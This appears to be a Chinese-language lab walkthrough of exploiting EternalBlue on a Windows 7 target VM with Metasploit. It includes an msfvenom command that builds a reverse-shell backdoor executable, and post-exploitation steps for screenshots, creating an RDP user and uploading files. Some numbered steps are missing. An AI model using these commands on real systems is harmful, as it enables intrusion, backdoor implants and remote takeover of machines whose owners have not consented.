msf攻击永恒之蓝
1.输入msfconsole进入msf6


3.在安装完成win7靶机之后

4.run 攻击成功

msf后门木马植入和远控监听
msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.129 lport=4444 -f exe -o demo.exe

进入后渗透阶段
1.getuid
2.sysinfo


4.screenshot 截屏 成功截取到win7当前桌面的图片


5.远程控制桌面 新建一个test用户
meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456
连接成功

但是缺点是对方会有显示

6.上传图片 upload 图片名.jpeg
上传成功,上传的位置为windows/system32

遇到的问题
connection 失败 拒绝远程连接
解决方法:
1.检查win7中的445端口是否开放,并且将防火墙进行关闭操作
2.检查kali和win7之间是否可以互相ping通
本文介绍了使用MetasploitFramework(msf)进行针对Windows7系统的永恒之蓝攻击,包括后门植入、Meterpreter利用、截图、创建新用户及RDP权限获取。同时探讨了连接失败的问题及其解决办法,如检查端口和防火墙设置。
1883

被折叠的 条评论
为什么被折叠?



